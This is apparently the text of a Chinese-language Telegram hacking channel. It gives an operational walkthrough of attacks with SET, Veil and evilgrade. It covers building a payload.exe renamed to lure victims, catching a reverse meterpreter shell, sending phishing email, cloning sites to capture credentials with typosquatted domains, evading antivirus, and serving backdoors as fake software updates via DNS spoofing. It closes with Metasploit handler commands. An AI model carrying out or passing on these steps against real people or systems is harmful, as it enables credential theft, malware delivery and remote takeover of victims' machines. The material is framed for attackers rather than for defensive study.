黑客网站渗透入侵破解拿权限
10.4K subscribers
2.39K photos
108 links
Download Telegram
社会工程学
社会工程学是一种心理战术,可以诱骗人们采取某些行动或泄露敏感信息。它依靠利用人类的情感、信任和好奇心,而不是使用技术方法来获取对机密数据的未经授权的访问。

简单来说,社会工程学就像一个骗子的游戏,攻击者操纵目标的感受和信任来得到他们想要的东西。

通过理解和操纵人类行为,这些攻击者可以欺骗受害者泄露他们的详细资料,如密码或财务信息,或执行危害安全的行为。

社会工程师工具包
社会工程工具包 (SET) 是用 Python 编写的,是专为社会工程设计的强大工具集合。渗透测试人员或红队成员经常使用它来模拟对员工的社会工程攻击,以测试组织的安全性。
开始使用社交工程师工具包
启动
Kali 中已预装了社交工程师工具包。要启动 SET,只需转到终端并输入:sudo setoolkit

选项
SET 启动后,您将看到一个选项菜单。本文将重点介绍选项一:社会工程攻击,它提供了多种攻击媒介。以下是此类别中可用选项的概述:

1)社会工程攻击: 该选项侧重于各种社会工程攻击媒介,包括鱼叉式网络钓鱼、网站攻击、感染性媒体生成和凭证窃取。它允许用户模拟和测试各种以人为中心的攻击场景。

2)渗透测试(Fast-Track): Fast-Track 是一套测试工具和脚本,旨在快速部署和利用安全漏洞。它有助于自动化渗透测试的各个方面,并加快发现和利用漏洞的过程

3) 第三方模块:此选项提供与安全社区开发的外部工具和模块的集成。这些模块扩展了 SET 的功能,并可提供工具包内使用的额外攻击媒介、漏洞和有效载荷。

4) 更新 Social-Engineer 工具包:此选项允许将 SET 更新到最新版本,确保您拥有最新的功能、错误修复和改进。定期更新对于维护有效且可靠的工具包至关重要。

5)更新SET配置:此选项可以让您修改SET配置文件。
社会工程工具包现在将创建恶意 exe 文件,将其命名为 payload.exe,并将其保存到 /root/.set 目录。
根据需要将文件重命名为其他名称。攻击者可能会将名称更改为诱使受害者点击的名称,例如应用程序的更新。
使用您上面选择的相同 IP 和端口在 metasploit 中启动多处理程序,然后输入运行。
用户必须单击恶意文件才能启动反向 shell。
一旦用户点击该文件,您就应该获得指向目标的反向 meterpreter shell。
网络钓鱼攻击
网络钓鱼是一种广泛使用的社会工程攻击,旨在诱骗用户泄露敏感信息,例如登录凭据、财务详细信息或个人身份信息。

通过操纵用户,使用户相信他们正在与合法来源进行交互,攻击者可以诱骗他们点击恶意链接、下载受恶意软件感染的文件或泄露机密信息。

可以使用 Gmail、Hotmail、Yahoo或 您域中的电子邮件地址通过 SET 执行网络钓鱼攻击。Gmail 是默认选项,也是我们将使用的选项。要在 Gmail、Hotmail 或 Yahoo 之间切换,您必须编辑 /etc/setoolkit/set.config 文件。
网络钓鱼活动
从主菜单中,选择选项一“社会工程攻击”,然后选择选项五“群发邮件攻击”,最后选择“电子邮件攻击单个电子邮件地址”。
发送电子邮件至: 这是目标的电子邮件。
接下来,您可以使用 Gmail 帐户或您的服务器帐户。
您的 Gmail 帐户: 您要从中发送电子邮件的帐户。
用户将看到的发件人姓名: 您想要显示的发件人姓名。
将此消息标记为高优先级: 是否希望将其标记为高优先级。
是否要附加文件: 是或否
是否要附加内联文件: 是或否
电子邮件主题: 电子邮件的主题行。
以 HTML 或纯文本形式发送消息: 选择您想要发送电子邮件的方式。
输入邮件正文: 在此处输入实际的电子邮件文本。写完电子邮件后,输入 END 并按回车键。
网站克隆和凭证窃取
网站克隆和凭证窃取是社交工程师的两项基本技术。这些技术包括创建合法网站的副本,并诱骗用户在假网站上输入敏感信息,例如用户名和密码。

这些信息随后可用于各种恶意活动,包括未经授权访问用户帐户、身份盗窃甚至企业间谍活动。

克隆站点
在 SET 中设置克隆站点之前,您需要在位于 /etc/setoolkit/set.config 的 SET 配置文件中启用 Apache Web 服务器。将行 APACHE_SERVER=OFF 更改为 APACHE_SERVER=ON,保存文件,然后重新启动 SET 以应用更改。
凭证窃取
当用户访问克隆网站并输入登录信息时,凭证将被捕获并发送到攻击者的机器。然后,攻击者可以利用这些信息在合法网站上未经授权访问用户帐户。
然后用户将被重定向到该服务的实际登录页面。
为了使克隆的网站更具说服力,攻击者经常采用诸如域名抢注(注册与目标网站名称相似的域名)等策略,例如 amzon.com(而不是 amazon.com),或使用目标网站的名称作为他们控制的另一个合法网站的子域名(amazon.myfakesite.com)。
veil使用
veil 有两个免杀的工具,Evasion 和Ordnance。

Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀

我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
Veil 是一款 Metasploit 有效负载生成器,可绕过常见的防病毒软件,例如智胜其签名匹配功能。它可以掩盖恶意软件的签名或具有提升权限的远程 shell,攻击者可以通过该 shell 访问目标。
evilgrade 是一个模块化框架,用于欺骗、注入攻击负载以及创建伪装成现有应用程序更新的后门。当您的目标计算机已完全修补或经常自我更新以作为安全措施时,它非常有用。
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
Evilgrade框架可以通过模拟中间人(MITM)攻击来对操作系统进行安全审计。这种攻击在攻击者拥有DNS访问权限和欺骗能力的情况下有效。Evilgrade使用更新不当的系统实用程序作为攻击媒介。Evilgrade支持的一些标准实用程序包括Notepad++、Ccleaner、Teamviewer、Virtualbox、Filezilla、Skype 和VMware。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
假设我们的目标运行的是“opera浏览器。我们将尝试动持浏览器的”更新功能,并将网站重定向到攻击者的首选位置,可
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
使用mitmf启动DNS欺骗,同时运行msfconsole以启动“multi-handler来监听传入的连接。
我们将使用名为exploit/multi/handler的漏洞,并借助名为“windows/meterpreter/reverse_https的有效负载,这种攻击方法将创建从目标计算机到攻击者计算机的反向连接,要启动msfconsole,请在新终端中输入“msfcolsole”。
程序启动后,输入(useexploit/multi/handler)来使用漏洞exploit/multi/handler”。需要根据使用Veil-Evasion创建的后门来设置有效载荷。创建了与针对Windows设备的”meterpreter/reverse_https相关的后门,因此有效载荷应设置为“reverse_https。要设置有效载荷类型(setPAYLOADwindows/meterpreter/reverse_https)。要显示需要设置的所有可用选项,请输入“showoptions”

现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。